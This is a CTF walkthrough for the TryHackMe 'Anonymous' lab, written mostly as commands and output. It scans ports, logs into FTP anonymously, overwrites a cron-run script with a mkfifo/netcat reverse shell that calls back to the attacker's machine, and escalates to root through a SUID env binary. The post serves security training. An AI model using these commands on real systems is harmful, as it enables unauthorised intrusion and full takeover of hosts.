wp-tryhackme-anonymous

Posted on Edited on In Views: Disqus: Word count in article: 372 Reading time ≈ 1 mins.
smb

anonymous

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
➜  ~ nmap 10.10.10.58 -F
...
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


➜  ~ nmap 10.10.10.58 -sV -p21,22,139,445
...
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

(ctf) ➜  tmp smbclient --list=10.10.10.58 --no-pass
...
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	pics            Disk      My SMB Share Directory for Pics
	IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
...

# ftp anon
# no password

(ctf) ➜  tmp ftp 10.10.10.58
Connected to 10.10.10.58.
220 NamelessOne's FTP Server!
Name (10.10.10.58:arch): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls scripts
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         2236 Feb 13 14:04 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

ftp> get clean.sh

to another terminal

(ctf)   tmp cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

# maybe crontab
# try to modify the script
# use put commond to overwrite, don't delete the file here

ftp> put clean.sh

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.2.30.143 5555 >/tmp/f

# another terminal
  ~ rlwrap nc -lvnp 5555
...
namelessone@anonymous:~$ ls
...
pics
user.txt
namelessone@anonymous:~$ cat user.txt
get flag1

# now there is a reverse shell and sudo commond need a tty so
python -c 'import pty; pty.spawn("/bin/bash")'

# but don't have the password
namelessone@anonymous:~$ sudo -l
[sudo] password for namelessone:

# try SUID

namelessone@anonymous:~$ find / -user root -perm /4000 2>/dev/null
...
/usr/bin/env
...

env /bin/sh -p # notice the -p argument
# cat /root/*
flag2